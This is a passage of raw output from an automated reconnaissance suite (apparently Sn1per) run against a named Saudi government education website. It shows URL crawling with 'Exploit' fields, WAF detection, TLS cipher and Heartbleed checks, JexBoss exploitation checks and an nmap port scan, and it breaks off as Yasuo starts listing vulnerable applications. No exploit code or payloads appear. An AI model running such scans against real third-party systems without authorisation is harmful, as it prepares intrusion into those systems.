  2190. |_[ + ] Found:: UNIDENTIFIED
  2191.  
  2192. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2193. |_[ + ] [ 57 / 100 ]-[04:09:24] [ - ]
  2194. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/2212 ]
  2195. |_[ + ] Exploit::
  2196. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2197. |_[ + ] More details:: / - / , ISP:
  2198. |_[ + ] Found:: UNIDENTIFIED
  2199.  
  2200. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2201. |_[ + ] [ 58 / 100 ]-[04:09:25] [ - ]
  2202. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14 ]
  2203. |_[ + ] Exploit::
  2204. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2205. |_[ + ] More details:: / - / , ISP:
  2206. |_[ + ] Found:: UNIDENTIFIED
  2207.  
  2208. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2209. |_[ + ] [ 59 / 100 ]-[04:09:27] [ - ]
  2210. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9152 ]
  2211. |_[ + ] Exploit::
  2212. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2213. |_[ + ] More details:: / - / , ISP:
  2214. |_[ + ] Found:: UNIDENTIFIED
  2215.  
  2216. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2217. |_[ + ] [ 60 / 100 ]-[04:09:31] [ - ]
  2218. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9090 ]
  2219. |_[ + ] Exploit::
  2220. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2221. |_[ + ] More details:: / - / , ISP:
  2222. |_[ + ] Found:: UNIDENTIFIED
  2223.  
  2224. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2225. |_[ + ] [ 61 / 100 ]-[04:09:34] [ - ]
  2226. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9198 ]
  2227. |_[ + ] Exploit::
  2228. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2229. |_[ + ] More details:: / - / , ISP:
  2230. |_[ + ] Found:: UNIDENTIFIED
  2231.  
  2232. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2233. |_[ + ] [ 62 / 100 ]-[04:09:35] [ - ]
  2234. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/s/9166 ]
  2235. |_[ + ] Exploit::
  2236. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2237. |_[ + ] More details:: / - / , ISP:
  2238. |_[ + ] Found:: UNIDENTIFIED
  2239.  
  2240. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2241. |_[ + ] [ 63 / 100 ]-[04:09:38] [ - ]
  2242. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/33/الموهوبون ]
  2243. |_[ + ] Exploit::
  2244. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2245. |_[ + ] More details:: / - / , ISP:
  2246. |_[ + ] Found:: UNIDENTIFIED
  2247.  
  2248. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2249. |_[ + ] [ 64 / 100 ]-[04:09:41] [ - ]
  2250. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/guestbook/l ]
  2251. |_[ + ] Exploit::
  2252. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2253. |_[ + ] More details:: / - / , ISP:
  2254. |_[ + ] Found:: UNIDENTIFIED
  2255.  
  2256. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2257. |_[ + ] [ 65 / 100 ]-[04:09:42] [ - ]
  2258. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/press/lpress ]
  2259. |_[ + ] Exploit::
  2260. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2261. |_[ + ] More details:: / - / , ISP:
  2262. |_[ + ] Found:: UNIDENTIFIED
  2263.  
  2264. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2265. |_[ + ] [ 66 / 100 ]-[04:09:44] [ - ]
  2266. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/quiz/new ]
  2267. |_[ + ] Exploit::
  2268. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2269. |_[ + ] More details:: / - / , ISP:
  2270. |_[ + ] Found:: UNIDENTIFIED
  2271.  
  2272. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2273. |_[ + ] [ 67 / 100 ]-[04:09:46] [ - ]
  2274. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/profile/55 ]
  2275. |_[ + ] Exploit::
  2276. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2277. |_[ + ] More details:: / - / , ISP:
  2278. |_[ + ] Found:: UNIDENTIFIED
  2279.  
  2280. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2281. |_[ + ] [ 68 / 100 ]-[04:09:48] [ - ]
  2282. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/profile/10 ]
  2283. |_[ + ] Exploit::
  2284. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2285. |_[ + ] More details:: / - / , ISP:
  2286. |_[ + ] Found:: UNIDENTIFIED
  2287.  
  2288. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2289. |_[ + ] [ 69 / 100 ]-[04:09:49] [ - ]
  2290. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/tags/l ]
  2291. |_[ + ] Exploit::
  2292. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2293. |_[ + ] More details:: / - / , ISP:
  2294. |_[ + ] Found:: UNIDENTIFIED
  2295.  
  2296. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2297. |_[ + ] [ 70 / 100 ]-[04:09:51] [ - ]
  2298. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/press/lspe ]
  2299. |_[ + ] Exploit::
  2300. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2301. |_[ + ] More details:: / - / , ISP:
  2302. |_[ + ] Found:: UNIDENTIFIED
  2303.  
  2304. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2305. |_[ + ] [ 71 / 100 ]-[04:09:52] [ - ]
  2306. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/event/new ]
  2307. |_[ + ] Exploit::
  2308. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2309. |_[ + ] More details:: / - / , ISP:
  2310. |_[ + ] Found:: UNIDENTIFIED
  2311.  
  2312. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2313. |_[ + ] [ 72 / 100 ]-[04:09:53] [ - ]
  2314. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/press/lmedia ]
  2315. |_[ + ] Exploit::
  2316. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2317. |_[ + ] More details:: / - / , ISP:
  2318. |_[ + ] Found:: UNIDENTIFIED
  2319.  
  2320. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2321. |_[ + ] [ 73 / 100 ]-[04:09:55] [ - ]
  2322. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/sitemap/l ]
  2323. |_[ + ] Exploit::
  2324. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2325. |_[ + ] More details:: / - / , ISP:
  2326. |_[ + ] Found:: UNIDENTIFIED
  2327.  
  2328. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2329. |_[ + ] [ 74 / 100 ]-[04:09:56] [ - ]
  2330. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/media/ltv ]
  2331. |_[ + ] Exploit::
  2332. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2333. |_[ + ] More details:: / - / , ISP:
  2334. |_[ + ] Found:: UNIDENTIFIED
  2335.  
  2336. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2337. |_[ + ] [ 75 / 100 ]-[04:09:58] [ - ]
  2338. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/saying/l ]
  2339. |_[ + ] Exploit::
  2340. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2341. |_[ + ] More details:: / - / , ISP:
  2342. |_[ + ] Found:: UNIDENTIFIED
  2343.  
  2344. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2345. |_[ + ] [ 76 / 100 ]-[04:09:59] [ - ]
  2346. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/profile/247 ]
  2347. |_[ + ] Exploit::
  2348. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2349. |_[ + ] More details:: / - / , ISP:
  2350. |_[ + ] Found:: UNIDENTIFIED
  2351.  
  2352. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2353. |_[ + ] [ 77 / 100 ]-[04:10:01] [ - ]
  2354. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/quiz/old ]
  2355. |_[ + ] Exploit::
  2356. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2357. |_[ + ] More details:: / - / , ISP:
  2358. |_[ + ] Found:: UNIDENTIFIED
  2359.  
  2360. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2361. |_[ + ] [ 78 / 100 ]-[04:10:03] [ - ]
  2362. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/release/lpub ]
  2363. |_[ + ] Exploit::
  2364. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2365. |_[ + ] More details:: / - / , ISP:
  2366. |_[ + ] Found:: UNIDENTIFIED
  2367.  
  2368. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2369. |_[ + ] [ 79 / 100 ]-[04:10:04] [ - ]
  2370. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/profile/504 ]
  2371. |_[ + ] Exploit::
  2372. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2373. |_[ + ] More details:: / - / , ISP:
  2374. |_[ + ] Found:: UNIDENTIFIED
  2375.  
  2376. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2377. |_[ + ] [ 80 / 100 ]-[04:10:07] [ - ]
  2378. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/30/p/23 ]
  2379. |_[ + ] Exploit::
  2380. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2381. |_[ + ] More details:: / - / , ISP:
  2382. |_[ + ] Found:: UNIDENTIFIED
  2383.  
  2384. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2385. |_[ + ] [ 81 / 100 ]-[04:10:09] [ - ]
  2386. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/12/شؤون-المعلمين ]
  2387. |_[ + ] Exploit::
  2388. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2389. |_[ + ] More details:: / - / , ISP:
  2390. |_[ + ] Found:: UNIDENTIFIED
  2391.  
  2392. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2393. |_[ + ] [ 82 / 100 ]-[04:10:11] [ - ]
  2394. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/149 ]
  2395. |_[ + ] Exploit::
  2396. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2397. |_[ + ] More details:: / - / , ISP:
  2398. |_[ + ] Found:: UNIDENTIFIED
  2399.  
  2400. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2401. |_[ + ] [ 83 / 100 ]-[04:10:12] [ - ]
  2402. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/75 ]
  2403. |_[ + ] Exploit::
  2404. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2405. |_[ + ] More details:: / - / , ISP:
  2406. |_[ + ] Found:: UNIDENTIFIED
  2407.  
  2408. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2409. |_[ + ] [ 84 / 100 ]-[04:10:16] [ - ]
  2410. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/111 ]
  2411. |_[ + ] Exploit::
  2412. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2413. |_[ + ] More details:: / - / , ISP:
  2414. |_[ + ] Found:: UNIDENTIFIED
  2415.  
  2416. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2417. |_[ + ] [ 85 / 100 ]-[04:10:17] [ - ]
  2418. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/142 ]
  2419. |_[ + ] Exploit::
  2420. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2421. |_[ + ] More details:: / - / , ISP:
  2422. |_[ + ] Found:: UNIDENTIFIED
  2423.  
  2424. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2425. |_[ + ] [ 86 / 100 ]-[04:10:19] [ - ]
  2426. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/183 ]
  2427. |_[ + ] Exploit::
  2428. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2429. |_[ + ] More details:: / - / , ISP:
  2430. |_[ + ] Found:: UNIDENTIFIED
  2431.  
  2432. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2433. |_[ + ] [ 87 / 100 ]-[04:10:21] [ - ]
  2434. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/32 ]
  2435. |_[ + ] Exploit::
  2436. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2437. |_[ + ] More details:: / - / , ISP:
  2438. |_[ + ] Found:: UNIDENTIFIED
  2439.  
  2440. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2441. |_[ + ] [ 88 / 100 ]-[04:10:23] [ - ]
  2442. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/95 ]
  2443. |_[ + ] Exploit::
  2444. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2445. |_[ + ] More details:: / - / , ISP:
  2446. |_[ + ] Found:: UNIDENTIFIED
  2447.  
  2448. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2449. |_[ + ] [ 89 / 100 ]-[04:10:25] [ - ]
  2450. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/134 ]
  2451. |_[ + ] Exploit::
  2452. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2453. |_[ + ] More details:: / - / , ISP:
  2454. |_[ + ] Found:: UNIDENTIFIED
  2455.  
  2456. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2457. |_[ + ] [ 90 / 100 ]-[04:10:27] [ - ]
  2458. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/61 ]
  2459. |_[ + ] Exploit::
  2460. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2461. |_[ + ] More details:: / - / , ISP:
  2462. |_[ + ] Found:: UNIDENTIFIED
  2463.  
  2464. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2465. |_[ + ] [ 91 / 100 ]-[04:10:30] [ - ]
  2466. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/78 ]
  2467. |_[ + ] Exploit::
  2468. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2469. |_[ + ] More details:: / - / , ISP:
  2470. |_[ + ] Found:: UNIDENTIFIED
  2471.  
  2472. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2473. |_[ + ] [ 92 / 100 ]-[04:10:35] [ - ]
  2474. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/3/p/14 ]
  2475. |_[ + ] Exploit::
  2476. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2477. |_[ + ] More details:: / - / , ISP:
  2478. |_[ + ] Found:: UNIDENTIFIED
  2479.  
  2480. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2481. |_[ + ] [ 93 / 100 ]-[04:10:39] [ - ]
  2482. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/22/التدريب-التربوي ]
  2483. |_[ + ] Exploit::
  2484. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2485. |_[ + ] More details:: / - / , ISP:
  2486. |_[ + ] Found:: UNIDENTIFIED
  2487.  
  2488. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2489. |_[ + ] [ 94 / 100 ]-[04:10:42] [ - ]
  2490. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/68 ]
  2491. |_[ + ] Exploit::
  2492. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2493. |_[ + ] More details:: / - / , ISP:
  2494. |_[ + ] Found:: UNIDENTIFIED
  2495.  
  2496. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2497. |_[ + ] [ 95 / 100 ]-[04:10:44] [ - ]
  2498. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/15/النشاط-الطلابي ]
  2499. |_[ + ] Exploit::
  2500. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2501. |_[ + ] More details:: / - / , ISP:
  2502. |_[ + ] Found:: UNIDENTIFIED
  2503.  
  2504. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2505. |_[ + ] [ 96 / 100 ]-[04:10:47] [ - ]
  2506. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/43 ]
  2507. |_[ + ] Exploit::
  2508. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2509. |_[ + ] More details:: / - / , ISP:
  2510. |_[ + ] Found:: UNIDENTIFIED
  2511.  
  2512. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2513. |_[ + ] [ 97 / 100 ]-[04:10:49] [ - ]
  2514. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/13/p/9 ]
  2515. |_[ + ] Exploit::
  2516. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2517. |_[ + ] More details:: / - / , ISP:
  2518. |_[ + ] Found:: UNIDENTIFIED
  2519.  
  2520. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2521. |_[ + ] [ 98 / 100 ]-[04:10:52] [ - ]
  2522. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/60 ]
  2523. |_[ + ] Exploit::
  2524. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2525. |_[ + ] More details:: / - / , ISP:
  2526. |_[ + ] Found:: UNIDENTIFIED
  2527.  
  2528. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2529. |_[ + ] [ 99 / 100 ]-[04:10:53] [ - ]
  2530. |_[ + ] Target:: [ http://www.hbthedu.gov.sa/new/l/14/p/39 ]
  2531. |_[ + ] Exploit::
  2532. |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:85.17.16.76:80
  2533. |_[ + ] More details:: / - / , ISP:
  2534. |_[ + ] Found:: UNIDENTIFIED
  2535.  
  2536. [ INFO ] [ Shutting down ]
  2537. [ INFO ] [ End of process INURLBR at [19-11-2018 04:10:53]
  2538. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  2539. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-www.hbthedu.gov.sa.txt ]
  2540. |_________________________________________________________________________________________
  2541.  
  2542. \_________________________________________________________________________________________/
  2543. #######################################################################################################################################
  2544.  
  2545. ^ ^
  2546. _ __ _ ____ _ __ _ _ ____
  2547. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2548. | V V // o // _/ | V V // 0 // 0 // _/
  2549. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2550. <
  2551. ...'
  2552.  
  2553. WAFW00F - Web Application Firewall Detection Tool
  2554.  
  2555. By Sandro Gauci && Wendel G. Henrique
  2556.  
  2557. Checking https://www.hbthedu.gov.sa
  2558. #######################################################################################################################################
  2559.  
  2560.  
  2561. AVAILABLE PLUGINS
  2562. -----------------
  2563.  
  2564. PluginSessionResumption
  2565. PluginOpenSSLCipherSuites
  2566. PluginChromeSha1Deprecation
  2567. PluginHeartbleed
  2568. PluginSessionRenegotiation
  2569. PluginCompression
  2570. PluginCertInfo
  2571. PluginHSTS
  2572.  
  2573.  
  2574.  
  2575. CHECKING HOST(S) AVAILABILITY
  2576. -----------------------------
  2577.  
  2578. www.hbthedu.gov.sa:443 => 85.17.16.76:443
  2579.  
  2580.  
  2581.  
  2582. SCAN RESULTS FOR WWW.HBTHEDU.GOV.SA:443 - 85.17.16.76:443
  2583. ---------------------------------------------------------
  2584.  
  2585. Unhandled exception when processing --reneg:
  2586. _nassl.OpenSSLError -
  2587. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  2588.  
  2589. Unhandled exception when processing --compression:
  2590. _nassl.OpenSSLError -
  2591. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  2592.  
  2593. * Session Resumption:
  2594. With Session IDs: ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
  2595. ERROR #1: OpenSSLError -
  2596. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  2597. ERROR #2: OpenSSLError -
  2598. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  2599. ERROR #3: OpenSSLError -
  2600. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  2601. ERROR #4: OpenSSLError -
  2602. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  2603. ERROR #5: OpenSSLError -
  2604. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  2605. With TLS Session Tickets: ERROR: OpenSSLError -
  2606. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  2607.  
  2608. Unhandled exception when processing --certinfo:
  2609. _nassl.OpenSSLError -
  2610. error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
  2611.  
  2612. * SSLV2 Cipher Suites:
  2613. Undefined - An unexpected error happened:
  2614. RC4-MD5 timeout - timed out
  2615. RC2-CBC-MD5 timeout - timed out
  2616. IDEA-CBC-MD5 timeout - timed out
  2617. EXP-RC4-MD5 timeout - timed out
  2618. EXP-RC2-CBC-MD5 timeout - timed out
  2619. DES-CBC3-MD5 timeout - timed out
  2620. DES-CBC-MD5 timeout - timed out
  2621.  
  2622. * SSLV3 Cipher Suites:
  2623. Undefined - An unexpected error happened:
  2624. SEED-SHA timeout - timed out
  2625. RC4-SHA timeout - timed out
  2626. RC4-MD5 timeout - timed out
  2627. NULL-SHA timeout - timed out
  2628. NULL-MD5 timeout - timed out
  2629. IDEA-CBC-SHA timeout - timed out
  2630. EXP-RC4-MD5 timeout - timed out
  2631. EXP-RC2-CBC-MD5 timeout - timed out
  2632. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
  2633. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
  2634. EXP-DES-CBC-SHA timeout - timed out
  2635. EXP-ADH-RC4-MD5 timeout - timed out
  2636. EXP-ADH-DES-CBC-SHA timeout - timed out
  2637. EDH-RSA-DES-CBC3-SHA timeout - timed out
  2638. EDH-RSA-DES-CBC-SHA timeout - timed out
  2639. EDH-DSS-DES-CBC3-SHA timeout - timed out
  2640. EDH-DSS-DES-CBC-SHA timeout - timed out
  2641. ECDHE-RSA-RC4-SHA timeout - timed out
  2642. ECDHE-RSA-NULL-SHA timeout - timed out
  2643. ECDHE-RSA-AES256-SHA timeout - timed out
  2644. ECDHE-RSA-AES128-SHA timeout - timed out
  2645. ECDHE-ECDSA-RC4-SHA timeout - timed out
  2646. ECDHE-ECDSA-NULL-SHA timeout - timed out
  2647. ECDHE-ECDSA-DES-CBC3-SHA timeout - timed out
  2648. ECDHE-ECDSA-AES128-SHA timeout - timed out
  2649. ECDH-RSA-RC4-SHA timeout - timed out
  2650. ECDH-RSA-NULL-SHA timeout - timed out
  2651. ECDH-RSA-DES-CBC3-SHA timeout - timed out
  2652. ECDH-RSA-AES256-SHA timeout - timed out
  2653. ECDH-RSA-AES128-SHA timeout - timed out
  2654. ECDH-ECDSA-RC4-SHA timeout - timed out
  2655. ECDH-ECDSA-NULL-SHA timeout - timed out
  2656. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
  2657. ECDH-ECDSA-AES256-SHA timeout - timed out
  2658. ECDH-ECDSA-AES128-SHA timeout - timed out
  2659. DHE-RSA-SEED-SHA timeout - timed out
  2660. DHE-RSA-CAMELLIA256-SHA timeout - timed out
  2661. DHE-RSA-AES256-SHA timeout - timed out
  2662. DHE-RSA-AES128-SHA timeout - timed out
  2663. DHE-DSS-SEED-SHA timeout - timed out
  2664. DHE-DSS-CAMELLIA256-SHA timeout - timed out
  2665. DHE-DSS-CAMELLIA128-SHA timeout - timed out
  2666. DHE-DSS-AES256-SHA timeout - timed out
  2667. DH-RSA-DES-CBC3-SHA timeout - timed out
  2668. DH-RSA-DES-CBC-SHA timeout - timed out
  2669. DH-RSA-CAMELLIA256-SHA timeout - timed out
  2670. DH-RSA-CAMELLIA128-SHA timeout - timed out
  2671. DH-RSA-AES256-SHA timeout - timed out
  2672. DH-DSS-SEED-SHA timeout - timed out
  2673. DH-DSS-DES-CBC3-SHA timeout - timed out
  2674. DH-DSS-DES-CBC-SHA timeout - timed out
  2675. DH-DSS-CAMELLIA256-SHA timeout - timed out
  2676. DH-DSS-CAMELLIA128-SHA timeout - timed out
  2677. DH-DSS-AES256-SHA timeout - timed out
  2678. DH-DSS-AES128-SHA timeout - timed out
  2679. CAMELLIA128-SHA timeout - timed out
  2680. AES256-SHA timeout - timed out
  2681. AES128-SHA timeout - timed out
  2682. AECDH-RC4-SHA timeout - timed out
  2683. AECDH-NULL-SHA timeout - timed out
  2684. AECDH-DES-CBC3-SHA timeout - timed out
  2685. AECDH-AES256-SHA timeout - timed out
  2686. AECDH-AES128-SHA timeout - timed out
  2687. ADH-SEED-SHA timeout - timed out
  2688. ADH-RC4-MD5 timeout - timed out
  2689. ADH-DES-CBC3-SHA timeout - timed out
  2690. ADH-CAMELLIA256-SHA timeout - timed out
  2691. ADH-CAMELLIA128-SHA timeout - timed out
  2692. ADH-AES256-SHA timeout - timed out
  2693. ADH-AES128-SHA timeout - timed out
  2694.  
  2695.  
  2696.  
  2697. SCAN COMPLETED IN 136.51 S
  2698. --------------------------
  2699. Version: 1.11.12-static
  2700. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2701.  
  2702. Connected to 85.17.16.76
  2703.  
  2704. Testing SSL server www.hbthedu.gov.sa on port 443 using SNI name www.hbthedu.gov.sa
  2705.  
  2706. TLS Fallback SCSV:
  2707. Server does not support TLS Fallback SCSV
  2708.  
  2709. TLS renegotiation:
  2710. Session renegotiation not supported
  2711.  
  2712. TLS Compression:
  2713. Compression disabled
  2714.  
  2715. Heartbleed:
  2716. TLS 1.2 not vulnerable to heartbleed
  2717. TLS 1.1 not vulnerable to heartbleed
  2718. TLS 1.0 not vulnerable to heartbleed
  2719.  
  2720. Supported Server Cipher(s):
  2721.  
  2722.  
  2723.  
  2724.  
  2725. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  2726. | * And others Java Deserialization Vulnerabilities * |
  2727. | |
  2728. | @author: João Filho Matos Figueiredo |
  2729. | @contact: joaomatosf@gmail.com |
  2730. | |
  2731. | @update: https://github.com/joaomatosf/jexboss |
  2732. #______________________________________________________#
  2733.  
  2734. @version: 1.2.4
  2735.  
  2736. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  2737.  
  2738.  
  2739. ** Checking Host: http://www.hbthedu.gov.sa:8888 **
  2740.  
  2741. [*] Checking admin-console: [ OK ]
  2742. [*] Checking Struts2: [ OK ]
  2743. [*] Checking Servlet Deserialization: [ OK ]
  2744. [*] Checking Application Deserialization: [ OK ]
  2745. [*] Checking Jenkins: [ OK ]
  2746. [*] Checking web-console: [ OK ]
  2747. [*] Checking jmx-console: [ OK ]
  2748. [*] Checking JMXInvokerServlet: [ OK ]
  2749.  
  2750.  
  2751. * Results:
  2752. The server is not vulnerable to bugs tested ... :D
  2753.  
  2754. * Info: review, suggestions, updates, etc:
  2755. https://github.com/joaomatosf/jexboss
  2756.  
  2757. * DONATE: Please consider making a donation to help improve this tool,
  2758. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
  2759.  
  2760. #######################################################################################################################################
  2761.  
  2762. I, [2018-11-19T04:13:43.588582 #16436] INFO -- : Initiating port scan
  2763. I, [2018-11-19T04:15:52.756300 #16436] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-19_04-13-43.xml
  2764. I, [2018-11-19T04:15:52.757479 #16436] INFO -- : Discovered open port: 85.17.16.76:80
  2765. I, [2018-11-19T04:15:53.394412 #16436] INFO -- : Discovered open port: 85.17.16.76:443
  2766. I, [2018-11-19T04:15:53.937734 #16436] INFO -- : <<<Enumerating vulnerable applications>>>
  2767.  
  2768.  
  2769. --------------------------------------------------------
  2770. <<<Yasuo discovered following vulnerable applications>>>
